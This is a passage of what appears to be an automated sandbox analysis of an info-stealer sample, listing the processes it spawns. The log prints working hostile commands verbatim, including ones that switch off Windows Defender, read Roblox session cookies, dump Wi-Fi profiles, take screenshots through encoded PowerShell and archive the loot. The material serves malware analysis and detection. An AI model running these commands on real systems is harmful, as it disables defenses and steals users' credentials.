HAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\vebzhwcp\vebzhwcp.cmdline"
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA7D9.tmp" "c:\Users\user\AppData\Local\Temp\vebzhwcp\CSCD4517BE1E6C4428293E27562A6116680.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\7VKXZ.zip" *"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\7VKXZ.zip" *
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Users\user\Desktop\sppawx.exe "C:\Users\user\Desktop\sppawx.exe"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()""Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAJump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI78082\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\7VKXZ.zip" *"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\sppawx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sppawx.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permissions and try again.', 0, 'Access Denied', 48+16);close()"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LISTJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ? .scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAI